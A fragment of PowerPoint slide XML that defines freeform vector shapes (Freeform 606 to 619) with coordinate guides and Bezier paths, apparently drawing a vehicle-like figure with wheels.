                          <a:pt x="0" y="439"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="30" y="446"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="30" y="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2" name="Freeform 606"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2057" y="4063"/>
                    <a:ext cx="198" cy="52"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 198 w 198"/>
                      <a:gd name="T1" fmla="*/ 7 h 52"/>
                      <a:gd name="T2" fmla="*/ 165 w 198"/>
                      <a:gd name="T3" fmla="*/ 0 h 52"/>
                      <a:gd name="T4" fmla="*/ 0 w 198"/>
                      <a:gd name="T5" fmla="*/ 45 h 52"/>
                      <a:gd name="T6" fmla="*/ 30 w 198"/>
                      <a:gd name="T7" fmla="*/ 52 h 52"/>
                      <a:gd name="T8" fmla="*/ 198 w 198"/>
                      <a:gd name="T9" fmla="*/ 7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8" h="52">
                        <a:moveTo>
                          <a:pt x="198" y="7"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="165" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="30" y="52"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="198" y="7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3" name="Freeform 607"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2033" y="3992"/>
                    <a:ext cx="26" cy="31"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 2 w 11"/>
                      <a:gd name="T1" fmla="*/ 2 h 13"/>
                      <a:gd name="T2" fmla="*/ 9 w 11"/>
                      <a:gd name="T3" fmla="*/ 4 h 13"/>
                      <a:gd name="T4" fmla="*/ 10 w 11"/>
                      <a:gd name="T5" fmla="*/ 12 h 13"/>
                      <a:gd name="T6" fmla="*/ 2 w 11"/>
                      <a:gd name="T7" fmla="*/ 9 h 13"/>
                      <a:gd name="T8" fmla="*/ 2 w 11"/>
                      <a:gd name="T9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3">
                        <a:moveTo>
                          <a:pt x="2" y="2"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="4" y="0"/>
                          <a:pt x="7" y="1"/>
                          <a:pt x="9" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="11" y="7"/>
                          <a:pt x="11" y="10"/>
                          <a:pt x="10" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="8" y="13"/>
                          <a:pt x="5" y="12"/>
                          <a:pt x="2" y="9"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="6"/>
                          <a:pt x="0" y="3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4" name="Freeform 608"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2033" y="4672"/>
                    <a:ext cx="26" cy="29"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 2 w 11"/>
                      <a:gd name="T1" fmla="*/ 1 h 12"/>
                      <a:gd name="T2" fmla="*/ 9 w 11"/>
                      <a:gd name="T3" fmla="*/ 4 h 12"/>
                      <a:gd name="T4" fmla="*/ 10 w 11"/>
                      <a:gd name="T5" fmla="*/ 11 h 12"/>
                      <a:gd name="T6" fmla="*/ 2 w 11"/>
                      <a:gd name="T7" fmla="*/ 9 h 12"/>
                      <a:gd name="T8" fmla="*/ 2 w 11"/>
                      <a:gd name="T9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2">
                        <a:moveTo>
                          <a:pt x="2" y="1"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="4" y="0"/>
                          <a:pt x="7" y="1"/>
                          <a:pt x="9" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="11" y="6"/>
                          <a:pt x="11" y="10"/>
                          <a:pt x="10" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="8" y="12"/>
                          <a:pt x="5" y="11"/>
                          <a:pt x="2" y="9"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="6"/>
                          <a:pt x="0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5" name="Freeform 609"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2045" y="3940"/>
                    <a:ext cx="220" cy="756"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 93"/>
                      <a:gd name="T1" fmla="*/ 25 h 320"/>
                      <a:gd name="T2" fmla="*/ 2 w 93"/>
                      <a:gd name="T3" fmla="*/ 33 h 320"/>
                      <a:gd name="T4" fmla="*/ 85 w 93"/>
                      <a:gd name="T5" fmla="*/ 10 h 320"/>
                      <a:gd name="T6" fmla="*/ 85 w 93"/>
                      <a:gd name="T7" fmla="*/ 290 h 320"/>
                      <a:gd name="T8" fmla="*/ 0 w 93"/>
                      <a:gd name="T9" fmla="*/ 312 h 320"/>
                      <a:gd name="T10" fmla="*/ 2 w 93"/>
                      <a:gd name="T11" fmla="*/ 320 h 320"/>
                      <a:gd name="T12" fmla="*/ 93 w 93"/>
                      <a:gd name="T13" fmla="*/ 296 h 320"/>
                      <a:gd name="T14" fmla="*/ 93 w 93"/>
                      <a:gd name="T15" fmla="*/ 0 h 320"/>
                      <a:gd name="T16" fmla="*/ 0 w 93"/>
                      <a:gd name="T17" fmla="*/ 25 h 3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3" h="320">
                        <a:moveTo>
                          <a:pt x="0" y="25"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="33"/>
                          <a:pt x="2" y="33"/>
                          <a:pt x="2" y="33"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="33"/>
                          <a:pt x="76" y="13"/>
                          <a:pt x="85" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="20"/>
                          <a:pt x="85" y="284"/>
                          <a:pt x="85" y="290"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="79" y="291"/>
                          <a:pt x="0" y="312"/>
                          <a:pt x="0" y="312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="320"/>
                          <a:pt x="2" y="320"/>
                          <a:pt x="2" y="320"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="93" y="296"/>
                          <a:pt x="93" y="296"/>
                          <a:pt x="93" y="296"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="93" y="0"/>
                          <a:pt x="93" y="0"/>
                          <a:pt x="93" y="0"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="0" y="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6" name="Freeform 610"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="344" y="5258"/>
                    <a:ext cx="435" cy="435"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 187 w 435"/>
                      <a:gd name="T1" fmla="*/ 435 h 435"/>
                      <a:gd name="T2" fmla="*/ 0 w 435"/>
                      <a:gd name="T3" fmla="*/ 241 h 435"/>
                      <a:gd name="T4" fmla="*/ 435 w 435"/>
                      <a:gd name="T5" fmla="*/ 0 h 435"/>
                      <a:gd name="T6" fmla="*/ 380 w 435"/>
                      <a:gd name="T7" fmla="*/ 383 h 435"/>
                      <a:gd name="T8" fmla="*/ 187 w 435"/>
                      <a:gd name="T9" fmla="*/ 435 h 4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35" h="435">
                        <a:moveTo>
                          <a:pt x="187" y="435"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="435" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="380" y="383"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="187" y="43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7" name="Freeform 611"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-1449" y="4762"/>
                    <a:ext cx="458" cy="449"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 187 w 458"/>
                      <a:gd name="T1" fmla="*/ 449 h 449"/>
                      <a:gd name="T2" fmla="*/ 0 w 458"/>
                      <a:gd name="T3" fmla="*/ 255 h 449"/>
                      <a:gd name="T4" fmla="*/ 458 w 458"/>
                      <a:gd name="T5" fmla="*/ 0 h 449"/>
                      <a:gd name="T6" fmla="*/ 380 w 458"/>
                      <a:gd name="T7" fmla="*/ 397 h 449"/>
                      <a:gd name="T8" fmla="*/ 187 w 458"/>
                      <a:gd name="T9" fmla="*/ 449 h 4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8" h="449">
                        <a:moveTo>
                          <a:pt x="187" y="449"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="255"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="458" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="380" y="397"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="187" y="44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8" name="Freeform 612"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="611" y="5357"/>
                    <a:ext cx="498" cy="549"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 168 w 211"/>
                      <a:gd name="T1" fmla="*/ 67 h 232"/>
                      <a:gd name="T2" fmla="*/ 46 w 211"/>
                      <a:gd name="T3" fmla="*/ 15 h 232"/>
                      <a:gd name="T4" fmla="*/ 46 w 211"/>
                      <a:gd name="T5" fmla="*/ 15 h 232"/>
                      <a:gd name="T6" fmla="*/ 12 w 211"/>
                      <a:gd name="T7" fmla="*/ 23 h 232"/>
                      <a:gd name="T8" fmla="*/ 19 w 211"/>
                      <a:gd name="T9" fmla="*/ 38 h 232"/>
                      <a:gd name="T10" fmla="*/ 41 w 211"/>
                      <a:gd name="T11" fmla="*/ 164 h 232"/>
                      <a:gd name="T12" fmla="*/ 100 w 211"/>
                      <a:gd name="T13" fmla="*/ 212 h 232"/>
                      <a:gd name="T14" fmla="*/ 109 w 211"/>
                      <a:gd name="T15" fmla="*/ 232 h 232"/>
                      <a:gd name="T16" fmla="*/ 154 w 211"/>
                      <a:gd name="T17" fmla="*/ 220 h 232"/>
                      <a:gd name="T18" fmla="*/ 154 w 211"/>
                      <a:gd name="T19" fmla="*/ 220 h 232"/>
                      <a:gd name="T20" fmla="*/ 176 w 211"/>
                      <a:gd name="T21" fmla="*/ 209 h 232"/>
                      <a:gd name="T22" fmla="*/ 168 w 211"/>
                      <a:gd name="T23" fmla="*/ 67 h 2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11" h="232">
                        <a:moveTo>
                          <a:pt x="168" y="67"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="134" y="21"/>
                          <a:pt x="82" y="0"/>
                          <a:pt x="46" y="15"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="15"/>
                          <a:pt x="46" y="15"/>
                          <a:pt x="46" y="15"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="23"/>
                          <a:pt x="12" y="23"/>
                          <a:pt x="12" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="19" y="38"/>
                          <a:pt x="19" y="38"/>
                          <a:pt x="19" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="70"/>
                          <a:pt x="8" y="121"/>
                          <a:pt x="41" y="164"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="58" y="187"/>
                          <a:pt x="79" y="203"/>
                          <a:pt x="100" y="212"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="109" y="232"/>
                          <a:pt x="109" y="232"/>
                          <a:pt x="109" y="232"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="154" y="220"/>
                          <a:pt x="154" y="220"/>
                          <a:pt x="154" y="220"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="154" y="220"/>
                          <a:pt x="154" y="220"/>
                          <a:pt x="154" y="220"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="162" y="218"/>
                          <a:pt x="169" y="214"/>
                          <a:pt x="176" y="209"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="211" y="183"/>
                          <a:pt x="208" y="119"/>
                          <a:pt x="168" y="67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9" name="Freeform 613"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="502" y="5374"/>
                    <a:ext cx="503" cy="569"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 178 w 213"/>
                      <a:gd name="T1" fmla="*/ 214 h 241"/>
                      <a:gd name="T2" fmla="*/ 43 w 213"/>
                      <a:gd name="T3" fmla="*/ 169 h 241"/>
                      <a:gd name="T4" fmla="*/ 35 w 213"/>
                      <a:gd name="T5" fmla="*/ 27 h 241"/>
                      <a:gd name="T6" fmla="*/ 170 w 213"/>
                      <a:gd name="T7" fmla="*/ 72 h 241"/>
                      <a:gd name="T8" fmla="*/ 178 w 213"/>
                      <a:gd name="T9" fmla="*/ 214 h 2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3" h="241">
                        <a:moveTo>
                          <a:pt x="178" y="214"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="142" y="241"/>
                          <a:pt x="82" y="221"/>
                          <a:pt x="43" y="169"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="117"/>
                          <a:pt x="0" y="54"/>
                          <a:pt x="35" y="27"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="70" y="0"/>
                          <a:pt x="131" y="20"/>
                          <a:pt x="170" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="210" y="124"/>
                          <a:pt x="213" y="188"/>
                          <a:pt x="178" y="21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0" name="Freeform 614"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="602" y="5485"/>
                    <a:ext cx="304" cy="347"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 108 w 129"/>
                      <a:gd name="T1" fmla="*/ 131 h 147"/>
                      <a:gd name="T2" fmla="*/ 26 w 129"/>
                      <a:gd name="T3" fmla="*/ 103 h 147"/>
                      <a:gd name="T4" fmla="*/ 21 w 129"/>
                      <a:gd name="T5" fmla="*/ 17 h 147"/>
                      <a:gd name="T6" fmla="*/ 103 w 129"/>
                      <a:gd name="T7" fmla="*/ 44 h 147"/>
                      <a:gd name="T8" fmla="*/ 108 w 129"/>
                      <a:gd name="T9" fmla="*/ 131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9" h="147">
                        <a:moveTo>
                          <a:pt x="108" y="131"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="147"/>
                          <a:pt x="50" y="135"/>
                          <a:pt x="26" y="103"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="72"/>
                          <a:pt x="0" y="33"/>
                          <a:pt x="21" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="0"/>
                          <a:pt x="79" y="13"/>
                          <a:pt x="103" y="44"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="127" y="76"/>
                          <a:pt x="129" y="114"/>
                          <a:pt x="108" y="131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1" name="Freeform 615"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-1189" y="4859"/>
                    <a:ext cx="498" cy="548"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 168 w 211"/>
                      <a:gd name="T1" fmla="*/ 67 h 232"/>
                      <a:gd name="T2" fmla="*/ 46 w 211"/>
                      <a:gd name="T3" fmla="*/ 15 h 232"/>
                      <a:gd name="T4" fmla="*/ 46 w 211"/>
                      <a:gd name="T5" fmla="*/ 14 h 232"/>
                      <a:gd name="T6" fmla="*/ 12 w 211"/>
                      <a:gd name="T7" fmla="*/ 23 h 232"/>
                      <a:gd name="T8" fmla="*/ 19 w 211"/>
                      <a:gd name="T9" fmla="*/ 38 h 232"/>
                      <a:gd name="T10" fmla="*/ 41 w 211"/>
                      <a:gd name="T11" fmla="*/ 164 h 232"/>
                      <a:gd name="T12" fmla="*/ 100 w 211"/>
                      <a:gd name="T13" fmla="*/ 212 h 232"/>
                      <a:gd name="T14" fmla="*/ 109 w 211"/>
                      <a:gd name="T15" fmla="*/ 232 h 232"/>
                      <a:gd name="T16" fmla="*/ 154 w 211"/>
                      <a:gd name="T17" fmla="*/ 219 h 232"/>
                      <a:gd name="T18" fmla="*/ 154 w 211"/>
                      <a:gd name="T19" fmla="*/ 219 h 232"/>
                      <a:gd name="T20" fmla="*/ 176 w 211"/>
                      <a:gd name="T21" fmla="*/ 209 h 232"/>
                      <a:gd name="T22" fmla="*/ 168 w 211"/>
                      <a:gd name="T23" fmla="*/ 67 h 2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11" h="232">
                        <a:moveTo>
                          <a:pt x="168" y="67"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="133" y="21"/>
                          <a:pt x="82" y="0"/>
                          <a:pt x="46" y="15"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="14"/>
                          <a:pt x="46" y="14"/>
                          <a:pt x="46" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="23"/>
                          <a:pt x="12" y="23"/>
                          <a:pt x="12" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="19" y="38"/>
                          <a:pt x="19" y="38"/>
                          <a:pt x="19" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="70"/>
                          <a:pt x="8" y="121"/>
                          <a:pt x="41" y="164"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="58" y="186"/>
                          <a:pt x="78" y="203"/>
                          <a:pt x="100" y="212"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="109" y="232"/>
                          <a:pt x="109" y="232"/>
                          <a:pt x="109" y="232"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="154" y="219"/>
                          <a:pt x="154" y="219"/>
                          <a:pt x="154" y="219"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="154" y="219"/>
                          <a:pt x="154" y="219"/>
                          <a:pt x="154" y="219"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="162" y="218"/>
                          <a:pt x="169" y="214"/>
                          <a:pt x="176" y="209"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="211" y="183"/>
                          <a:pt x="207" y="119"/>
                          <a:pt x="168" y="67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2" name="Freeform 616"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-1298" y="4875"/>
                    <a:ext cx="503" cy="570"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 177 w 213"/>
                      <a:gd name="T1" fmla="*/ 214 h 241"/>
                      <a:gd name="T2" fmla="*/ 42 w 213"/>
                      <a:gd name="T3" fmla="*/ 169 h 241"/>
                      <a:gd name="T4" fmla="*/ 35 w 213"/>
                      <a:gd name="T5" fmla="*/ 27 h 241"/>
                      <a:gd name="T6" fmla="*/ 170 w 213"/>
                      <a:gd name="T7" fmla="*/ 72 h 241"/>
                      <a:gd name="T8" fmla="*/ 177 w 213"/>
                      <a:gd name="T9" fmla="*/ 214 h 2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3" h="241">
                        <a:moveTo>
                          <a:pt x="177" y="214"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="142" y="241"/>
                          <a:pt x="82" y="221"/>
                          <a:pt x="42" y="169"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="117"/>
                          <a:pt x="0" y="53"/>
                          <a:pt x="35" y="27"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="70" y="0"/>
                          <a:pt x="131" y="20"/>
                          <a:pt x="170" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="209" y="124"/>
                          <a:pt x="213" y="187"/>
                          <a:pt x="177" y="21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3" name="Freeform 617"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-1201" y="4987"/>
                    <a:ext cx="307" cy="347"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 108 w 130"/>
                      <a:gd name="T1" fmla="*/ 130 h 147"/>
                      <a:gd name="T2" fmla="*/ 26 w 130"/>
                      <a:gd name="T3" fmla="*/ 103 h 147"/>
                      <a:gd name="T4" fmla="*/ 22 w 130"/>
                      <a:gd name="T5" fmla="*/ 16 h 147"/>
                      <a:gd name="T6" fmla="*/ 104 w 130"/>
                      <a:gd name="T7" fmla="*/ 44 h 147"/>
                      <a:gd name="T8" fmla="*/ 108 w 130"/>
                      <a:gd name="T9" fmla="*/ 130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0" h="147">
                        <a:moveTo>
                          <a:pt x="108" y="130"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="87" y="147"/>
                          <a:pt x="50" y="134"/>
                          <a:pt x="26" y="103"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="71"/>
                          <a:pt x="0" y="33"/>
                          <a:pt x="22" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="0"/>
                          <a:pt x="80" y="12"/>
                          <a:pt x="104" y="44"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="128" y="75"/>
                          <a:pt x="130" y="114"/>
                          <a:pt x="108" y="13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4" name="Freeform 618"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-1496" y="3465"/>
                    <a:ext cx="2740" cy="2393"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 1144 w 1160"/>
                      <a:gd name="T1" fmla="*/ 727 h 1013"/>
                      <a:gd name="T2" fmla="*/ 1054 w 1160"/>
                      <a:gd name="T3" fmla="*/ 679 h 1013"/>
                      <a:gd name="T4" fmla="*/ 954 w 1160"/>
                      <a:gd name="T5" fmla="*/ 346 h 1013"/>
                      <a:gd name="T6" fmla="*/ 876 w 1160"/>
                      <a:gd name="T7" fmla="*/ 233 h 1013"/>
                      <a:gd name="T8" fmla="*/ 0 w 1160"/>
                      <a:gd name="T9" fmla="*/ 0 h 1013"/>
                      <a:gd name="T10" fmla="*/ 0 w 1160"/>
                      <a:gd name="T11" fmla="*/ 713 h 1013"/>
                      <a:gd name="T12" fmla="*/ 99 w 1160"/>
                      <a:gd name="T13" fmla="*/ 739 h 1013"/>
                      <a:gd name="T14" fmla="*/ 110 w 1160"/>
                      <a:gd name="T15" fmla="*/ 613 h 1013"/>
                      <a:gd name="T16" fmla="*/ 261 w 1160"/>
                      <a:gd name="T17" fmla="*/ 663 h 1013"/>
                      <a:gd name="T18" fmla="*/ 292 w 1160"/>
                      <a:gd name="T19" fmla="*/ 791 h 1013"/>
                      <a:gd name="T20" fmla="*/ 858 w 1160"/>
                      <a:gd name="T21" fmla="*/ 943 h 1013"/>
                      <a:gd name="T22" fmla="*/ 873 w 1160"/>
                      <a:gd name="T23" fmla="*/ 824 h 1013"/>
                      <a:gd name="T24" fmla="*/ 1024 w 1160"/>
                      <a:gd name="T25" fmla="*/ 874 h 1013"/>
                      <a:gd name="T26" fmla="*/ 1056 w 1160"/>
                      <a:gd name="T27" fmla="*/ 996 h 1013"/>
                      <a:gd name="T28" fmla="*/ 1089 w 1160"/>
                      <a:gd name="T29" fmla="*/ 1005 h 1013"/>
                      <a:gd name="T30" fmla="*/ 1144 w 1160"/>
                      <a:gd name="T31" fmla="*/ 1013 h 1013"/>
                      <a:gd name="T32" fmla="*/ 1144 w 1160"/>
                      <a:gd name="T33" fmla="*/ 727 h 10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160" h="1013">
                        <a:moveTo>
                          <a:pt x="1144" y="727"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="1127" y="704"/>
                          <a:pt x="1054" y="679"/>
                          <a:pt x="1054" y="679"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="954" y="346"/>
                          <a:pt x="954" y="346"/>
                          <a:pt x="954" y="346"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="954" y="346"/>
                          <a:pt x="934" y="250"/>
                          <a:pt x="876" y="23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713"/>
                          <a:pt x="0" y="713"/>
                          <a:pt x="0" y="713"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="739"/>
                          <a:pt x="99" y="739"/>
                          <a:pt x="99" y="739"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="689"/>
                          <a:pt x="78" y="637"/>
                          <a:pt x="110" y="613"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="583"/>
                          <a:pt x="217" y="605"/>
                          <a:pt x="261" y="663"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="294" y="706"/>
                          <a:pt x="304" y="756"/>
                          <a:pt x="292" y="791"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="858" y="943"/>
                          <a:pt x="858" y="943"/>
                          <a:pt x="858" y="943"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="837" y="895"/>
                          <a:pt x="842" y="847"/>
                          <a:pt x="873" y="824"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="912" y="794"/>
                          <a:pt x="980" y="816"/>
                          <a:pt x="1024" y="874"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1054" y="915"/>
                          <a:pt x="1066" y="961"/>
                          <a:pt x="1056" y="996"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1089" y="1005"/>
                          <a:pt x="1089" y="1005"/>
                          <a:pt x="1089" y="1005"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1144" y="1013"/>
                          <a:pt x="1144" y="1013"/>
                          <a:pt x="1144" y="1013"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1144" y="1013"/>
                          <a:pt x="1160" y="750"/>
                          <a:pt x="1144" y="727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5" name="Freeform 619"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-1496" y="3101"/>
                    <a:ext cx="3413" cy="915"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 1344 w 3413"/>
                      <a:gd name="T1" fmla="*/ 0 h 915"/>
                      <a:gd name="T2" fmla="*/ 0 w 3413"/>
                      <a:gd name="T3" fmla="*/ 364 h 915"/>
                      <a:gd name="T4" fmla="*/ 1344 w 3413"/>
                      <a:gd name="T5" fmla="*/ 721 h 915"/>
                      <a:gd name="T6" fmla="*/ 1564 w 3413"/>
